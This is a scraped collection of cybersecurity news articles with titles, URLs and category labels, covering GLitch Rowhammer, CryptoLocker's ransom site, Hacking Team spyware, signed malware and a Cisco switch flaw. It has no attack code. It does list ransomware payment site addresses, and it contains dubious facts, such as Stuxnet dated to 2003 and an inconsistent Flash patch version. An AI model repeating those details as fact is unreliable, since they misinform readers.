technique is a new addition to the Rowhammer attack series which leverages embedded graphics processing units (GPUs) to carry out a Rowhammer attack against Android smartphones. Rowhammer is a problem with recent generation dynamic random access memory (DRAM) chips in which repeatedly accessing a row of memory can cause ""bit flipping"" in an adjacent row, allowing anyone to change the value of contents stored in computer memory. Known since at least 2012, the issue was first exploited by Google's Project Zero researchers in early 2015, when they pulled off remote Rowhammer attacks on computers running Windows and Linux. Last year, a team of researchers in the VUSec Lab at Vrije Universiteit Amsterdam demonstrated that the Rowhammer technique could also work on Android smartphones, but with a major limitation of a malicious application being first installed on the target phone. However, the same team of researchers has now shown how their proof-of-concept attack ""GLitch,"" can exploit the Rowhammer attack technique simply by hosting a website running malicious JavaScript code to remotely hack an Android smartphone under just 2 minutes, without relying on any software bug. Since the malicious code runs only within the privileges of the web browser, it can spy on user's browsing pattern or steal their credentials. However, the attacker cannot gain further access to user's Android phone. Here's How GLitch Attack Works GLitch is the first remote Rowhammer technique that exploits the graphics processing units (GPU), which is found in almost all mobile processors, instead of the CPU that was exploited in all previous theorized versions of the Rowhammer attack. Since the ARM processors inside Android smartphones include a type of cache that makes it difficult to access targeted rows of memory, researchers make use of GPU, whose cache can be more easily controlled, allowing hackers to hammer targeted rows without any interference. The technique is named GLitch with first two letters capitalized because it uses a widely used browser-based graphics code library known as WebGL for rendering graphics to trigger a known glitch in DDR3 and DDR4 memory chips. Currently, GLitch targets smartphones running the Snapdragon 800 and 801 system on a chip—that includes both CPU and GPU—meaning the PoC works only on older Android phones like the LG Nexus 5, HTC One M8, or LG G2. The attack can be launched against Firefox and Chrome. In a video demonstration, the researchers show their JavaScript-based GLitch attack on a Nexus 5 running over Mozilla's Firefox browser to gain read/write privileges, giving them the ability to execute malicious code over the software. ""If you're wondering if we can trigger bit flips on Chrome the answer is yes, we can. As a matter of fact, most of our research was carried out on Chrome,"" the researchers said. ""We then switched to Firefox for the exploit just because we had prior knowledge of the platform and found more documentation."" No Software Patch Can Fully Fix the Rowhammer Issue Since Rowhammer exploits a computer hardware weakness, no software patch can completely fix the issue. Researchers say the Rowhammer threat is not only real but also has the potential to cause some real, severe damage. Although there's no way to fully block an Android phone's GPU from tampering with the DRAM, the team has been working with Google on ways to solve the problem. For more in-depth details on the new attack technique, you can head on to this informational page about GLitch and this paper [PDF] published by the researchers. ",Vulnerability CryptoLocker developer launches Decryption Service website; 10 Bitcoins for Decryption Keys,https://thehackernews.com/2013/11/CryptoLocker-Ransomware-Decryption-service-malware-keys.html,"There's an extraordinary malware making rock-n-roll over the Internet and if you are one of the unlucky folks to cross its path, then it could make your computer unusable and you have to pay a few hundred Dollars to retrieve your important data back. We have warned our readers in many previous articles about a nasty piece of Ransomware malware called 'CryptoLocker', which is targeting computers running the Microsoft Windows operating system. The CryptoLocker Ransomware encrypts the files on a victim's computer and issues an ultimatum - Pay up or lose your data. Users who are getting infected with CryptoLocker can see a message informing them that their computer is locked up and their files encrypted. It then asks them to make a ransom payment, which typically ranges between $100 and $700 or 2 Bitcoins, to get their files back. Just yesterday I noticed on a forum that the criminals behind the CryptoLocker malware has recently launched a dedicated CryptoLocker decryption service website that allows victims to purchase the decryption key for their infected encrypted files. Interestingly, Malware inside the system is asking for only 2 Bitcoins ($450 USD) for the decryption keys, whereas the newly launched service price has been significantly increased 10 Bitcoins i.e. Approx $2,100 USD. Service is available on the website https://yocmvpiarwmfgyg.net/ or https://93.189.44.187/ (Russia based hosting server) and also accessible through the Tor network https://f2d2v7soksbskekh.onion/ Why Hackers has launched the Decryption Service ? Currently almost all antivirus companies are on Red alert about CryptoLocker malware and they have released updates for their users, that can detect and remove the infection or the registry keys from the system which is actually required to pay the ransom and decryption process. So if malware will get deleted, neither victim will get the decryption keys ever, neither criminal will get paid for it. So the criminal actors behind the CryptoLocker malware has launched the decryption service website, which is designed to look like a customer support site for victims. How the Decryption Service works ? The victim can upload one of its encrypted files on the service website, which will generate an order number. After uploading, a further order status page will display the date-time of infection and victim's public key. It will then prompt the user to purchase the private key by paying 10 Bitcoins or approximately $2,200 USD. Once a payment is made, just after the confirmation, the website will allow the user to download a decryption private key and a decrypter tool. Which can be used to decrypt all CryptoLocker encrypted files on the system. Another interesting fact about the service website is that, if the user has already paid the ransom amount, they will provide the private key and decrypter free of cost. CryptoLocker Ransomware, A Global threat CryptoLocker infections were found across different regions, including Europe Middle East, North America and Asia Pacific. Almost 64% victims are from the US. There are different ways an individual or an organization can handle the CryptoLocker threat. Unfortunately, there is no known tool to decrypt the files encrypted by CryptoLocker, so always take Backup of important Files. Always ensure your system softwares and Antivirus product is up-to-date. Antivirus firm Bitdefender has just released a tool to protect your files from CryptoLocker. You can Download Anti-CryptoLocker here. ",Malware FBI compromised Tor hidden service to bust largest Child Pornography Ring,https://thehackernews.com/2013/09/FBI-compromised-Tor-hidden-hosting-Child-Pornography-firefox-exploit.html,"A few days before the servers of the largest provider of Ultra Anonymous hosting were found to be serving custom malware designed to identify visitors who were using the Tor service to hide their identity online. The javascript code exploited a security vulnerability in the open-source version of Firefox that the Tor network is based on. In an Irish court, FBI agent admitted publicly that the agency had control of Freedom Hosting, a Tor hidden service operator company, in an effort to arrest a suspect behind the largest child porn facilitator on the planet. Eric Eoin Marques, a 28-year-old Irishman, is now awaiting extradition to the US where he could face 100 years in prison on child pornography charges. Marques is the owner and operator of Freedom Hosting, one of the largest web hosts for the Tor network., Hosting many of the darkest hidden services on the Darknet, including criminal hacking site HackBB, money laundering services, and responsible for hosting child porn on 550 servers throughout Europe. The FBI agent alleged when officers examined the RAM from Marques's seized computer it revealed he had made inquiries about how to get a visa and entry into Russia, and residency and citizenship there. Online searches had also been made for a US passport template and US passport hologram star. Eric Eoin Marques apparently already sent the earnings of his profitable Freedom Hosting business to his girlfriend over in Romania. Just two weeks ago, we have learned that the National Security Agency may have developed either decryption capabilities or secret backdoor that enabled it to break most Internet encryption. But Taking control over all Freedom Hosting servers by FBI agents and inserting some tracking code really seems like an incredibly questionable move by any Law Enforcement agency. ",Vulnerability "Security researchers will disclose vulnerabilities in Embedded, ARM, x86 & NFC",https://thehackernews.com/2012/07/security-researchers-will-disclose.html,"Security researchers are expected to disclose new vulnerabilities in near field communication (NFC), mobile baseband firmware, HTML5 and Web application firewalls next week at the Black Hat USA 2012 security conference. The Black Hat session aim to expose sometimes shocking vulnerabilities in widely used products. They also typically show countermeasures to plug the holes. Two independent security consultants will give a class called ""Advanced ARM exploitation,"" part of a broader five-day private class the duo developed. In a sold-out session, they will detail hardware hacks of multiple ARM platforms running Linux, some described on a separate blog posting. The purpose of the talk is to reach a broader audience and share the more interesting bits of the research that went into developing the Practical ARM Exploitation and presenters Stephen Ridley and Stephen Lawler demonstrate how to defeat XN, ASLR, stack cookies, etc. using nuances of the ARM architecture on Linux. In addition to mobile and Web security, Black Hat presentations will also cover security issues and attack techniques affecting industrial control systems, smart meters and embedded devices. ",Vulnerability Massive Data Breach Exposes 6.6 Million Plaintext Passwords from Ad Company,https://thehackernews.com/2016/09/plaintext-passwords-leaked.html,"Another Day, Another Data Breach! And this time, it's worse than any recent data breaches. Why? Because the data breach has exposed plaintext passwords, usernames, email addresses, and a large trove of other personal information of more than 6.6 Million ClixSense users. ClixSense, a website that claims to pay users for viewing advertisements and completing online surveys, is the latest victim to join the list of ""Mega-Breaches"" revealed in recent months, including LinkedIn, MySpace, VK.com, Tumblr, and Dropbox. Hackers are Selling Plaintext Passwords and Complete Website Source Code More than 2.2 Million people have already had their personal and sensitive data posted to PasteBin over the weekend. The hackers who dumped the data has put another 4.4 Million accounts up for sale. In addition to un-hashed passwords and email addresses, the dump database includes first and last names, dates of birth, sex, home addresses, IP addresses, payment histories, and other banking details of Millions of users. Troy Hunt, operator of Have I Been Pwned? breach notification service, verified the authenticity of the data taken from ClixSense. Besides giving away 4.4 Million accounts to the highest bidder, the hackers are also offering social security numbers of compromised users, along with the complete source code of the ClixSense website and ""70,000 emails"" from the company's internal email server, according to a Pastebin message advertising the stolen database. PasteBin has since removed the post as well as the sample of the compromised database that contained user account information. Here's How Hackers Hacked ClixSence: ClixSense admitted the data breach and said some unknown hackers were able to get access to its main database through an old server which the firm was no longer using, but at the time, still networked to its main database server. After gaining access, the hacker was able ""to copy most, if not all"" of the ClixSense users table, ran SQL code to change account names to ""hacked account,"" deleted several forum posts, as well as set account balances of users to $0.00. While talking to Ars Technica, ClixSense owner Jim Grago admitted that the database contained entries for roughly 6.6 Million accounts and that the company became aware of the breach on September 4 and managed to regain control of their DNS over the weekend. ""This all started last Sunday, September 4th about 5 am EST when my lead developer called me and said ClixSense was redirecting to a gay porn site. The hackers were able to take over our DNS and setup the redirection,"" Grago wrote. ""On Monday (Labor day) they were able to hack into our hosting provider and turned off all of our servers, hacked into our Microsoft Exchange server and changed the passwords on all of our email accounts. On Tuesday they were able to gain access to a server that was directly connected to our database server and get a copy of our users table."" Change Your Passwords and Security Questions Now Users are strongly advised to change their passwords for ClixSence account immediately, and it would also be a good idea to reset passwords for all of your other online services, especially those using the same passwords. Since ClixSense uses a large trove of personal information on its users, make sure you change your security questions, if it uses any of the information you provided to ClixSense, such as your address, date of birth, or other identifying information. Moreover, I recommend you to use a good password manager to create strong and complex passwords for your different online accounts, and it will remember all of them on your behalf. I have listed some of the best password managers that could help you understand the importance of password manager and choose one according to your requirement. ",Data_Breaches China-made E-Cigarette Chargers Could Infect Your Computer with Virus,https://thehackernews.com/2014/11/china-made-e-cigarette-chargers-could_26.html,"It's better for smokers to quit smoking. Are you using electronic cigarettes (E-cigarettes) instead normal ones?? Still, you should quit your smoking habit, because it not only damages your health, but could pose a danger risk to the health of your computer. E-cigarettes have become the latest vector for hackers to distribute malicious software. E-cigarettes manufactured in China are reportedly being used to spread malware via a USB port to computers when users plug in for charging it up. The report broke when an executive at a ""large corporation"" had been infected with malware from an undetermined source after he quit smoking and switched to e-cigarettes made in China, detailed a recent post to social news forum Reddit. Further investigating the matter, he found that the chargers of the e-cigarettes - bought from the online auction site eBay for $5 - are hard-coded with the malware that infected his workstation despite having latest virus and anti malware programs installed. ""The executive's system was patched up to date, had antivirus and anti-malware protection,"" Reddit user Jrockilla said. ""Web logs were scoured and all attempts made to identify the source of the infection but to no avail."" ""Finally after all traditional means of infection were covered, IT started looking into other possibilities. They finally asked the executive: 'Have there been any changes in your life recently?' The executive answered: 'Well yes, I quit smoking two weeks ago and switched to e-cigarettes.' And that was the answer they were looking for."" Rik Ferguson, a security consultant for Trend Micro, also considers the matter plausible and says, ""Production line malware has been around for a few years, infecting photo frames, MP3 players and more."" In 2008, for instance, a photo frame produced by Samsung shipped with malware on the product's install disc, the Guardian reported. ""Hackers are able to exploit any electronic device to serve malware to a poorly protected network,"" Pierluigi Paganini, chief information security officer at ID management firm, said in a blog post. ""Despite the [fact the] idea could appear hilarious, many electronic cigarettes can be charged over USB using a special cable or by inserting one end of the cigarette directly into a USB port."" The idea is similar to the BadUSB, whose source code was released by the researchers last month on the open source code hosting website Github. BadUSB was capable to spread itself by hiding in the firmware meant to control the ways in which USB devices connect to computers. Ferguson explained that ""a very strong case can be made for enterprises disabling USB ports, or at least using device management to allow only authorised devices."" ",Malware Hacking Team: We're Victim of a Criminal Cyber Attack,https://thehackernews.com/2015/07/hacking-team-press-statement.html,"Hacking Team, the Italy-based spyware company that sells spying software to law enforcement agencies worldwide, says the company has always operated with the law and regulation in an ethical manner. However, there was only one Violation of Law in this entire event, and that is – ""the massive cyber attack on the Hacking Team."" company stated. The recent hack on Hacking Team exposed nearly 500GB of massive internal documents including internal emails, hacking tools, zero-day exploits, surveillance tools, source code for Spyware and a spreadsheet listing every government client with date of purchase and amount paid. Hacking Team Hack and Media Reports: The attack on Hacking Team was really huge in every sense. The team finally shows its disappointment with media on its hacking incident saying, the company that helps government fight crimes is being treated as the culprits, and the criminals who attacked the company are not. ""Had a media company been attacked as Hacking Team has been, the press would be outraged,"" Hacking Team wrote in its press release Wednesday. But, every media including us have mentioned that Hacking Team got hacked, which by default indicates that they were the victim to cyber crime. So far, neither they nor anyone in media knows who has hacked and leaked 500GB of internal data belonging to Hacking Team. So, what do they expect from Media to talk about? The Unknown Hacker, about whom no one knows, or the 500 GB of leaked Hacking Team's Secrets Hacking Team Spyware: Fighting for Crime or aiding Surveillance? Apart from this, the Hacking Team claimed that the strong spyware and hacking tools developed by the company are actually required by the law enforcement agencies to fight crime and terrorism. We all know that what NSA and other government agencies are doing (espionage/surveillance) with such capabilities, instead of putting every effort to fight crime and terrorism. Recently, a 46-year-old member of South Korea's National Intelligence Service (NIS) apparently committed suicide after it was revealed that the Asian country bought spying tools from the Hacking Team. A Suicide note left by the agent at the scene referenced the Hacking Team controversy, and claimed his intelligence team did not use Hacking Team tools to spy on South Korean citizens' mobile phone or any other online communications. This incident could be part of the same conspiracy, which is yet to be investigated. Some Facts Highlighted by Hacking Team Highlighting the facts about its recent hack attack, the company says the attackers stole and exposed the personal information of its employees and some of its clients. However, the attackers were unable to access the data collected by company's clients using purchased spying software, as such information is only stored on the customer's systems and can't be accessed by the company itself. The attackers also exposed some of its source code on the Internet, but according to Hacking Team, the essential elements of its source code were not compromised in the attack. The company agreed of selling its equipments to countries, including Ethiopia, Sudan, Russia and South Korea among others, but always sold ""strictly under the law and regulation."" ""There have been reports that our software contained some sort of ""backdoor"" that permitted Hacking Team insight into the operations of our clients or the ability to disable their software,"" The company says. ""This is not true."" ""No such backdoors were ever present, and clients have been permitted to examine the source code to reassure themselves of this fact."" The company also denied its involvement in any program that make use of airborne drones to attack computers and smartphone devices through Wi-Fi networks as it has been reported earlier this week. ",Cyber_Attack Adobe to issue Emergency Patch for Critical Flash Player Vulnerability,https://thehackernews.com/2016/04/adobe-flash-update.html,"Adobe has been one of the favorite picks of the Hackers to mess with any systems devoid of any operating systems, as Flash Player is a front runner in all the browsers. Hackers have already been targeting Flash Player for long by exploiting known vulnerabilities roaming in the wild. Despite Adobe's efforts, Flash is not safe anymore for Internet security, as one more critical vulnerability had been discovered in the Flash Player that could crash the affected system and potentially allow an attacker to take control of the system. Discovered by a French Researcher Kafeine, FireEye's Genwei Jiang, and Google's Clement Lecigne, the flaw affects Adobe Flash Player 21.0.0.197 and its earlier versions for Windows, Macintosh, Linux and Chrome OS. The vulnerability, assigned under CVE-2016-1019, also expands back to Windows 7 and even towards Windows XP. Adobe had also confirmed that the newly discovered vulnerability in its Flash Player is being exploited actively in the wild. Update Adobe Flash Player Software This issue caused the Adobe engineers to urgently work on a mitigation method and release an emergency update under Flash Player 21.0.0.182, which is expected to get released this Thursday. Usually, Adobe releases its patch on the second Tuesday of the month, the same day as Microsoft, but rolls out emergency patches on an ad hoc basis, analyzing the seriousness of the bug. The endless Adobe updates and upgrades had failed to ensure the user security in the real time scenario. So it's high time for users to disable or completely uninstall Adobe Flash Player. Believe or not, Adobe Flash Player is dead and its time has passed. In January last year, YouTube moved away from Flash for delivering videos. Although in between Flash made an effort to beef up its security in a bid to justify its existence, things got a bit heated when Firefox became aware of a critical bug and blocked the Flash plugin entirely. Facebook's Security Chief publicly called for Adobe to announce a kill date for Flash. In fact, Google Chrome has also begun blocking auto-playing Flash ads by default. ",Malware Trojan.Milicenso Print Bomb - Printer Trojan cause massive printing,https://thehackernews.com/2012/06/trojanmilicenso-print-bomb-printer.html,"Trojan.Milicenso - Printer Trojan cause massive printing A Trojan that sends printers crazy, making them print pages of garbled nonsense until all the paper has been used up, has seen a spike in activity.Symantec detected the Trojan.Milicenso across various countries, but the worst hit regions were the US and India followed by regions in South America and Europe, including the UK. According to a blog post published Thursday by researchers from antivirus provider Symantec, Dubbed ""Trojan.Milicenso"" it has been described by security researchers as a malware delivery vehicle ""for hire"" through its repeated use since it was first discovered in 2010. The Milicenso Trojan is actually a backdoor that is used to deliver other malware on the affected machines. The infection vectors are links and malicious attachments in unsolicited emails, as well as websites hosting malicious scripts that trigger the download of the Trojan. ""Depending on the configuration, any files, including binary files, created in that folder will trigger print jobs,"" said Symantec. ""The Trojan creates and executes a dropper executable, which in turn creates a DLL file in the %System% folder"" It's like dragging a system file into a plain-text editor: most of the time you'll see garbage. Symantec said there were a number of ways the malware can find its way onto PCs, including opening a malware-laden email attachment, through a compromised website, or posing as fake video codecs.Once the malware is opened, it redirects the user to pages to serve up adverts; a common way for malware writers to generate quick revenue. ",Malware Researchers Uncover Spying Tool Used by Governments to Hijack all Types of Smartphones,https://thehackernews.com/2014/06/researchers-uncover-spying-tool-used-by.html,"Purchasing malware to victimize people is illegal by laws but if the same thing any government official do, then its not!! Yes, the police forces around the World are following the footsteps of U.S. National Security Agency (NSA) and FBI. Researchers from the Citizen Lab at the Munk School of Global Affairs at the University of Toronto and computer security firm Kaspersky Lab have unearthed a broad network of controversial spyware which is specially designed to give law enforcement agencies complete access to a suspect's phone for the purpose of surveillance. MALWARE FOR DESKTOPS AND ALL MOBILE DEVICES The malware, dubbed as Remote Control System (RCS), also known as Da Vinci and Galileo, is developed by an Italian company known as Hacking Team, available for desktop computers, laptops, and mobile devices. The latest version of the malware works for all phone including Android, iOS, Windows Mobile, Symbian and BlackBerry devices, but best on Android devices, and can also be installed on jailbroken iOS devices. But even if the targeted iOS device is not jailbroken, the malware uses the famous Evasi0n jailbreaking tool to install the malware easily. The team of researchers from both Citizen Lab and Kaspersky Lab in collaboration has presented their findings during an event in London. According to the report published, the diameter of the command infrastructure supporting Hacking Team, which sells the RCS to governments and law enforcement, is very vast with 326 command-and-control (C&C) servers running in more than 40 countries. MALWARE DEVELOPERS - 'HACKING TEAM' Hacking Team is a Milan-based IT company with more than 50 employees that has made a totally different place for itself selling ""offensive"" intrusion and surveillance software to governments and law enforcement agencies in ""several dozen countries"" on ""six continents."" ""It was a well-known fact for quite some time that the HackingTeam products included malware for mobile phones. However, these were rarely seen,"" said Kaspersky Lab experts on the blog post. ""In particular, the Android and iOS Trojans have never been identified before and represented one of the remaining blank spots in the story."" WORLD WIDE WEB OF COMMAND-N-CONTROL SERVERS Kaspersky Lab researchers have used a fingerprinting method to scan the entire IPv4 space and to identify the IP addresses of RCS Command & Control servers around the world and found the biggest host in United States with 64 counts of C&C servers. Next on the list was Kazakhstan with 49, Ecuador has 35, UK which hosts 32 control systems and many other countries with a grand total of 326 Command & Control servers. ""The presence of these servers in a given country doesn't mean to say they are used by that particular country's law enforcement agencies,"" said Sergey Golovanov, principal security researcher at Kaspersky Lab. ""However, it makes sense for the users of RCS to deploy C&Cs in locations they control – where there are minimal risks of cross-border legal issues or server seizures."" ATTACK VECTOR AND MALWARE FEATURES RCS can be physically implanted on the victim's device through a USB or SD card, and remotely it can be installed through spear phishing, exploit kits, drive-by downloads or network traffic injection. Once installed on Apple iOS and Android device, the new module enable governments and law enforcement officers with larger capabilities to monitor victim devices, including the ability to: control phone network steal data from their device record voice E-mail intercept SMS and MMS messages obtain call history report on their location use the device's microphone in real time intercept voice and SMS messages sent via applications such as Skype, WhatsApp, Viber, and much more. ""Secretly activating the microphone and taking regular camera shots provides constant surveillance of the target—which is much more powerful than traditional cloak and dagger operations,"" Golovanov wrote. While, the Android module is protected by an optimizer for Android called DexGuard that made the it extremely difficult to analyze. However, most of the iOS capabilities mentioned above are also available for Android, along with the support for hijacking applications such Facebook, Google Talk, Tencent of China and many more. The mobile modules for each are custom-built for each target, researchers said. From previous disclosures we have seen that RCS is currently being used to spy on political dissidents, journalists, human rights advocates, and opposing political figures. ",Vulnerability The Rise of Super-Stealthy Digitally Signed Malware—Thanks to the Dark Web,https://thehackernews.com/2017/11/malware-digital-certificate.html,"Guess what's more expensive than counterfeit United States passports, stolen credit cards and even guns on the dark web? It's digital code signing certificates. A recent study conducted by the Cyber Security Research Institute (CSRI) this week revealed that stolen digital code-signing certificates are readily available for anyone to purchase on the dark web for up to $1,200. As you may know, digital certificates issued by a trusted certificate authority (CA) are used to cryptographically sign computer applications and software, and are trusted by your computer for execution of those programs without any warning messages. However, malware author and hackers who are always in search of advanced techniques to bypass security solutions have been abusing trusted digital certificates during recent years. Hackers use compromised code signing certificates associated with trusted software vendors in order to sign their malicious code, reducing the possibility of their malware being detected on targeted enterprise networks and consumer devices. The infamous Stuxnet worm that targeted Iranian nuclear processing facilities in 2003 also used legitimate digital certificates. Also, the recent CCleaner-tainted downloads infection was made possible due to digitally-signed software update. Stealthy Digitally-Signed Malware Is Increasingly Prevalent However, separate research conducted by a team of security researchers have found that digitally signed malware has become much more common than previously thought. The trio researchers—Doowon Kim, BumJun Kwon and Tudor Dumitras from the University of Maryland, College Park—said they found a total of 325 signed malware samples, of which 189 (58.2%) carried valid digital signatures while 136 carry malformed digital signatures. ""Such malformed signatures are useful for an adversary: we find that simply copying an Authenticode signature from a legitimate sample to an unsigned malware sample may help the malware bypass AV detection,"" the researchers said. Those 189 malware samples signed correctly were generated using 111 compromised unique certificates issued by recognized CAs and used to sign legitimate software. At the time of writing, 27 of these compromised certificates had been revoked, although malware signed by one of the remaining 84 certificates that were not revoked would still be trusted as long as carry a trusted timestamp. ""A large fraction (88.8%) of malware families rely on a single certificate, which suggests that the abusive certificates are mostly controlled by the malware authors rather than by third parties,"" the trio said. The researchers have released a list of the abusive certificates at signedmalware.org. Revoking Stolen Certificate Doesn't Stop Malware Immediately Even when a signature is not valid, the researchers found that at least 34 anti-virus products failed to check the certificate's validity, eventually allowing malicious code to run on the targeted system. The researchers also conducted an experiment to determine if malformed signatures can affect the anti-virus detections. To demonstrate this, they downloaded 5 random unsigned ransomware samples that almost all anti-virus programs detected as malicious. The trio then took two expired certificates that previously had been used to sign both legitimate software and in-the-wild malware and used them to sign each of the five ransomware samples. Top Antivirus Fail to Detect Malware Signed With Stolen Certificates When analysing the resulting ten new samples, the researchers found that many anti-virus products failed to detect the malware as malicious. The top three anti-virus products—nProtect, Tencent, and Paloalto—detected unsigned ransomware samples as malware, but considered eight of out ten crafted samples as benign. Even popular anti-virus engines from Kaspersky Labs, Microsoft, TrendMicro, Symantec, and Commodo, failed to detect some of the known malicious samples. Other affected anti-virus packages included CrowdStrike, Fortinet, Avira, Malwarebytes, SentinelOne, Sophos, TrendMicro and Qihoo, among others. ""We believe that this [inability in detecting malware samples] is due to the fact that AVs take digital signatures into account when filter and prioritize the list of files to scan, in order to reduce the overhead imposed on the user's host,"" the researchers said. ""However, the incorrect implementation of Authenticode signature checks in many AVs gives malware authors the opportunity to evade detection with a simple and inexpensive method."" The researchers said they reported this issue to the affected antivirus companies, and one of them had confirmed that their product fails to check the signatures correctly and they had planned to fix the issue. The researchers presented their findings at the Computer and Communications Security (CCS) conference in Dallas on Wednesday. For more detailed information on the research, you can head on to their research paper [PDF] titled ""Certified Malware: Measuring Breaches of Trust in the Windows Code-Signing PKI."" ",Malware North Korean Hackers Using ELECTRICFISH Tunnels to Exfiltrate Data,https://thehackernews.com/2019/05/north-korean-hacking-tool.html,"The U.S. Department of Homeland Security (DHS) and the FBI have issued another joint alert about a new piece of malware that the prolific North Korean APT hacking group Hidden Cobra has actively been using in the wild. Hidden Cobra, also known as Lazarus Group and Guardians of Peace, is believed to be backed by North Korean government and known to launch cyber attacks against media organizations, aerospace, financial and critical infrastructure sectors across the world. The hacking group was the same associated with the 2017 WannaCry ransomware menace, the 2014 Sony Pictures hack, and the SWIFT Banking attack in 2016. Now, the DHS and the FBI have uncovered a new malware variant, dubbed ELECTRICFISH, that Hidden Cobra hackers have been using for secretly tunneling traffic out of compromised computer systems. The malware implements a custom protocol configured with a proxy server/port and proxy username and password, allowing hackers to bypass the compromised system's required authentication to reach outside of the network. The ElectricFish malware is a command-line utility whose primary purpose is to quickly funnel traffic between two IP addresses. The malware allows Hidden Cobra hackers to configure with a proxy server/port and proxy username and password, making it possible to connect to a system sitting inside of a proxy server, which allows the attackers to bypass the infected system's required authentication. ""It will attempt to establish TCP sessions with the source IP address and the destination IP address. If a connection is made to both the source and destination IPs, this malicious utility will implement a custom protocol, which will allow traffic to rapidly and efficiently be funneled between two machines,"" the alert reads. ""If necessary, the malware can authenticate with a proxy to be able to reach the destination IP address. A configured proxy server is not required for this utility."" Once ElectricFish authenticates with the configured proxy, it immediately attempts to establish a session with the destination IP address, located outside of the victim network and the source IP address. The attack would use command prompts to specify the source and destination for tunneling traffic. Though the US-CERT website doesn't state whether or if yes, which US organizations have already been infected with this new malware, the joint malware analysis report (MAR) does say that the alert has been issued ""to enable network defense and reduce exposure to North Korean government malicious cyber activity."" This is not the very first time the DHS and the FBI have issued a joint alert to warn users and organizations about the Hidden Cobra malware. Late last year, the U.S. departments warned about the FastCash malware that Hidden Cobra had been using since 2016 to compromise payment switch application servers in banks in Africa and Asia in an attempt to cash out bank ATMs. Little less than a year ago, the DHS and the FBI also published an advisory alerting users of two different malware—a fully functional Remote Access Trojan (RAT) known as Joanap and a Server Message Block (SMB) worm called Brambul—linked to Hidden Cobra. In 2017, the US-CERT also issued an alert detailing Hidden Cobra malware called Delta Charlie—a DDoS tool that they believed the North Korean hackers use to launch distributed denial-of-service attacks against its targets. ",Cyber_Attack Israeli Power Grid Authority Suffers Massive Cyber Attack,https://thehackernews.com/2016/01/power-grid-cyberattack.html,"The country which built a Digital Iron Dome, Israel had undergone one of the largest serious cyber attack this year. This time, the name of Israel is being popped up in the current headlines is for the massive cyber attack which triggered against the Nation's Electrical Power Grid Authority's Network. ""Yesterday we identified one of the largest cyber attacks that we have experienced,"" Energy Minister Yuval Steinitz confirmed at the CyberTech 2016 Conference at the Tel Aviv Trade Fair and Convention Center on Tuesday, according to an article published by The Times of Israel. ""The virus was already identified and the right software was already prepared to neutralize it,"" Steinitz added. ""We'd to paralyze many of the computers of the Israeli Electricity Authority. We are handling the situation and I hope that soon, this very serious event will be over...but as of now, computer systems are still not working as they should."" Severe Cyber Attack on Israel Electricity Infrastructure The 'severe' attack occurred earliest this week, as Israel is currently undergoing record-breaking electricity consumption for last two days with a demand of 12,610 Megawatts due to the freezing temperature, confirmed by Israel Electric Corporation. However, the officials did not comment upon the perpetrators as they do not suspect any currently, but they did tell Israeli newspaper Haaretz that '[they] are going to solve this problem in the coming hours.' In Mid-July 2015, the Israel's National Cyber Bureau had already warned about the computer-based hacking attacks, which shut down portions of the country's electricity grid. The identity of the suspects behind this attack has not been known, neither the energy ministry provides any details about how the attack was carried out. However, a spokesperson for Israel's Electricity Authority confirmed some of its computer systems had been shut down for two days due to the cyber attack. Previous Known Cyber Attacks on SCADA Systems Israel had been the continual victim for many of the cyber attacks previously like OpIsrael (a coordinated attack by anti-Israeli Groups & Palestinians), which was conducted on 7th April 2013, on the eve of Holocaust Remembrance Day with the goal of ""Erase Israel from Internet."" Another attack on the Israeli Civilian communication was carried out by Iran & Hezbollah Group last year. In response to these attacks, Israel had broadened their skills to combat cyber war and become a center for cybersecurity, R&D Labs with multinationals from the US, Europe, and Asia. Israeli Cyber Security firms claimed to export $3 Billion last year. A similar incident of power outbreak took place a couple of months back in Ukraine on 23rd December, when the country's SCADA system was hit with a trojan named BlackEnergy that resulted in the total power cut across the region named Ivano-Frankivsk of Ukraine. This Article has been written by our editorial intern. Special Thanks to Rakesh Krishnan for covering this article. ",Cyber_Attack Critical flaw leaves thousands of Cisco Switches vulnerable to remote hacking,https://thehackernews.com/2018/04/cisco-switches-hacking.html,"Security researchers at Embedi have disclosed a critical vulnerability in Cisco IOS Software and Cisco IOS XE Software that could allow an unauthenticated, remote attacker to execute arbitrary code, take full control over the vulnerable network equipment and intercept traffic. The stack-based buffer overflow vulnerability (CVE-2018-0171) resides due to improper validation of packet data in Smart Install Client, a plug-and-play configuration and image-management feature that helps administrators to deploy (client) network switches easily. Embedi has published technical details and Proof-of-Concept (PoC) code after Cisco today released patch updates to address this remote code execution vulnerability, which has been given a base Common Vulnerability Scoring System (CVSS) score of 9.8 (critical). Researchers found a total of 8.5 million devices with the vulnerable port open on the Internet, leaving approximately 250,000 unpatched devices open to hackers. To exploit this vulnerability, an attacker needs to send a crafted Smart Install message to an affected device on TCP port 4786, which is opened by default. ""To be more precise, the buffer overflow takes place in the function smi_ibc_handle_ibd_init_discovery_msg"" and ""because the size of the data copied to a fixed-size buffer is not checked, the size and data are taken directly from the network packet and are controlled by an attacker,"" Cisco explain in its advisory. The vulnerability can also result in a denial-of-service condition (watchdog crash) by triggering indefinite loop on the affected devices. Researchers demonstrated the vulnerability at a conference in Hong Kong after reporting it to Cisco in May 2017. Video Demonstrations of the Attack: In their first demonstration, as shown in the video below, researchers targeted Cisco Catalyst 2960 switch to reset/change the password and entered privileged EXEC mode: In their second demo, researchers exploited the flaw to successfully intercept the traffic between other devices connected to the vulnerable switch and the Internet. Affected Hardware and Software: The vulnerability was tested on Catalyst 4500 Supervisor Engines, Cisco Catalyst 3850 Series Switches, and Cisco Catalyst 2960 Series Switches devices, as well as all devices that fall into the Smart Install Client type are potentially vulnerable, including: Catalyst 4500 Supervisor Engines Catalyst 3850 Series Catalyst 3750 Series Catalyst 3650 Series Catalyst 3560 Series Catalyst 2960 Series Catalyst 2975 Series IE 2000 IE 3000 IE 3010 IE 4000 IE 4010 IE 5000 SM-ES2 SKUs SM-ES3 SKUs NME-16ES-1G-P SM-X-ES3 SKUs Cisco fixed the vulnerability in all of its affected products on 28th March 2018, and Embedi published a blog post detailing the vulnerability on 29th March. So, administrators are highly recommended to install free software updates to address the issue as soon as possible. ",Vulnerability Hackers stole money from European ATMs using Malware-loaded USB Device,https://thehackernews.com/2014/01/hacking-ATM-machine-Malware-USB-Drive.html,"Hacking ATM Machines is nothing new, but it seems that instead of relying on ATM skimmers now some smart hackers in Europe are reportedly targeting ATM Machines using Malware-loaded USB drives to steal money. Most of the world's ATMs are running on Windows XP operating system, which is highly vulnerable to Malware attacks. Just like your Desktop Laptops, some ATMs also have USB sockets, which is hidden behind the ATM's fascia. The German security researchers who discovered 